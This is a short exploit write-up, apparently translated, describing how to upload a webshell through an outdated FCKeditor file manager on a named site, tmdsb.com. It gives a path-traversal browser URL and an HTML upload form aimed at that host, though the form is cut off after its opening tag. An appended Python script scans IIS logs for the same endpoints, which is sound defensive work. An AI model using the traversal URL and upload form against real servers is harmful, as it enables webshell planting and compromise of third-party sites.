Many people still use this program, and few vulnerabilities in it have been published, but FCKeditor itself has many vulnerabilities.
This program uses an earlier version of FCKeditor, so webshells can be uploaded directly. Combined with the IIS parsing vulnerability, a webshell can be saved in many ways.
The test is as follows:
http://www.tmdsb.com/controls/fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspx
If connector.aspx has been deleted, the following code can be used.
<form id="frmUpload" enctype="multipart/form-data" action="http://www.tmdsb.com/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">Upload a new file:
Save the code above as test.html and you can upload a shell directly.
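To check whether these endpoints are being requested on a server you operate, the following added example (not part of the original post) scans IIS W3C extended log lines for the FCKeditor file manager paths named above. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# FCKeditor file manager endpoints named in the write-up above.
FCK_PATH = re.compile(
    r"/fckeditor/editor/filemanager/.*(browser\.html|connector\.aspx|upload\.aspx)$",
    re.IGNORECASE)

# Constructed sample of an IIS W3C extended log (documentation IP range).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-01-01 10:00:00 GET /index.aspx - 192.0.2.10 200
2024-01-01 10:00:05 GET /controls/fckeditor/editor/filemanager/browser/default/browser.html Type=../&Connector=connectors/aspx/connector.aspx 192.0.2.44 200
2024-01-01 10:00:09 POST /controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx Type=Media 192.0.2.44 200
""".splitlines()

def parse_w3c(lines):
    """Yield one dict per request, using the most recent #Fields header."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))

def classify(entry):
    """Return the reasons a request deserves review (empty list if none)."""
    stem = unquote(entry.get("cs-uri-stem", ""))
    if not FCK_PATH.search(stem):
        return []
    reasons = ["fckeditor-filemanager"]
    query = entry.get("cs-uri-query", "-")
    params = parse_qs("" if query == "-" else query)  # also percent-decodes
    if any(".." in v for vs in params.values() for v in vs):
        reasons.append("path-traversal-in-parameter")
    if entry.get("cs-method") == "POST" and stem.lower().endswith(
            ("upload.aspx", "connector.aspx")):
        reasons.append("upload-post")
    return reasons

def review(lines):
    """Return (client_ip, uri_stem, reasons) for every flagged request."""
    return [(e.get("c-ip"), e["cs-uri-stem"], r)
            for e in parse_w3c(lines) if (r := classify(e))]

if __name__ == "__main__":
    for hit in review(SAMPLE_LOG):
        print(hit)
```

Any hit on a production site is also a prompt to remove or restrict the bundled file manager, since the editor does not need it to be reachable by anonymous users.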